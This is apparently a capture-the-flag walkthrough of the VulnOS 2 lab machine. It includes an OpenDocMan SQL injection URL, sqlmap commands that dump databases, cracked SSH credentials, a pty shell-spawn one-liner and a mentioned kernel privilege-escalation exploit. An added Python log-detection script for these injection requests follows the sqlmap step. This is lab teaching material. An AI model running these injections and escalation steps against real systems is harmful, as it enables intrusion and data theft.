VulnOS 2 vulnhub
Machine IP: 192.168.2.8
Nmap
nmap -v -A -sCV 192.168.2.8
Nmap scan report for 192.168.2.8
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 f5:4d:c8:e7:8b:c1:b2:11:95:24:fd:0e:4c:3c:3b:3b (DSA)
| 2048 ff:19:33:7a:c1:ee:b5:d0:dc:66:51:da:f0:6e:fc:48 (RSA)
| 256 ae:d7:6f:cc:ed:4a:82:8b:e8:66:a5:11:7a:11:5f:86 (ECDSA)
|_ 256 71:bc:6b:7b:56:02:a4:8e:ce:1c:8e:a6:1e:3a:37:94 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: VulnOSv2
6667/tcp open irc ngircd
Let’s start enumerating port 80
We can see a hyperlink on the page. Following it, we are presented with another website.
The documentation tab gives some information about a new site and its credentials.
Browsing to the above-mentioned folder, we reach a new page that gives away the version of the document management system.
Let’s search for OpenDocMan v1.2.7 exploits.
http://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9
We run sqlmap to exploit the injection and enumerate the admin credentials.
sqlmap -u "http://192.168.2.8/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value --dbs --dbms=mysql
root@ghost:/home/vijay/vulnhub/vulnosv2# sqlmap -u "http://192.168.2.8/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value --dbs --dbms=mysql
available databases [6]:
[*] drupal7
[*] information_schema
[*] jabcd0cs
[*] mysql
[*] performance_schema
[*] phpmyadmin
root@ghost:/home/vijay/vulnhub/vulnosv2# sqlmap -u "http://192.168.2.8/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value -D jabcd0cs --dump
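From the defender's side, the requests above stand out in the web server's access log. The following is an added example, not part of the original walkthrough or of OpenDocMan: a Python check that flags requests to ajax_udf.php whose add_value parameter is anything other than a bare table name. The log lines, client address and timestamps are constructed, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed sample lines in Apache combined log format (not captured from the target).
SAMPLE_LOG = [
    '192.168.2.5 - - [10/Jan/2020:10:00:01 +0000] "GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '192.168.2.5 - - [10/Jan/2020:10:00:07 +0000] "GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9 HTTP/1.1" 200 540 "-" "Mozilla/5.0"',
    '192.168.2.5 - - [10/Jan/2020:10:00:09 +0000] "GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%2520UNION%2520ALL%2520SELECT%2520NULL HTTP/1.1" 200 120 "-" "sqlmap/1.4"',
    '192.168.2.5 - - [10/Jan/2020:10:00:12 +0000] "GET /jabcd0cs/index.php HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
]

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" \d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"')
# Assumption: a legitimate add_value is a bare table name such as odm_user.
IDENT_RE = re.compile(r"[A-Za-z0-9_]{1,64}")
SQL_RE = re.compile(r"\b(union|select|sleep|benchmark|information_schema)\b|--|/\*|[()';]", re.I)

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so %2520 and %20 normalise to the same text."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_line(line):
    """Return (client_ip, reasons) for a suspicious ajax_udf.php request, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    if not url.path.endswith("/ajax_udf.php"):
        return None
    reasons = []
    # parse_qs decodes once; keep_blank_values so an empty add_value is still checked
    for raw in parse_qs(url.query, keep_blank_values=True).get("add_value", []):
        value = fully_decode(raw)
        if not IDENT_RE.fullmatch(value):
            reasons.append("add_value is not a bare identifier")
        if SQL_RE.search(value):
            reasons.append("SQL syntax in add_value")
    if "sqlmap" in m["ua"].lower():
        reasons.append("sqlmap user agent")
    return (m["ip"], reasons) if reasons else None

def scan(lines):
    """Return the findings for every line that inspect_line() flags."""
    return [hit for hit in map(inspect_line, lines) if hit]
```

The same identifier check, applied server-side to add_value before it reaches the query, is the corresponding input-validation control.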
Let’s try and crack credentials
Username : webmin
Password : webmin1980
Let’s log in over SSH
Now we start privilege escalation
$ python -c 'import pty;pty.spawn("/bin/bash")'
webmin@VulnOSv2:~$ uname -a
Linux VulnOSv2 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014 i686 i686 i686 GNU/Linux
We see the kernel version: 3.13.0-24-generic
A Google search for “VulnOSv2 3.13.0 exploit” leads to an overlayfs local privilege escalation exploit.
We start a Python HTTP server
python -m SimpleHTTPServer 12
Let’s root the server
Got the flag.txt